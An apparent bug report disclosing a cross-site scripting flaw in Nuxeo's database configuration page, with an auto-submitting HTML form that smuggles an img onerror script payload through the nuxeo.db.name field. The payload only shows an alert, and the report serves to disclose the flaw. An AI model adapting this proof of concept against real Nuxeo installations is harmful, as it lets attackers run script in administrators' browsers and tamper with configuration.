Minor To be tested with Firefox.
To reproduce:
- Open the attached XSS.html
- The alert is displayed
Content of XSS.html:
<body onload='go();'> <form method=post name=i action='http://localhost:8080/nuxeo/DB'> <input type='hidden' name='refresh' value='false'> <input type='hidden' name='nuxeo.dbtemplate' value='postgresql'> <input type='hidden' name='nuxeo.db.name' value='n"><img src=x onerror=alert(/XSS/)>'> <input type='hidden' name='nuxeo.db.user' value='nuxeo'> <input type='hidden' name='nuxeo.db.password' value='password'> <input type='hidden' name='nuxeo.db.host' value='localhost'> <input type='hidden' name='nuxeo.db.port' value='5432'> <input type='hidden' name='nuxeo.dbnosqltemplate' value='none'> <input type='submit' value='PoC' name='r'> </form> <script> function go() { document.i.r.click(); } </script> </body>
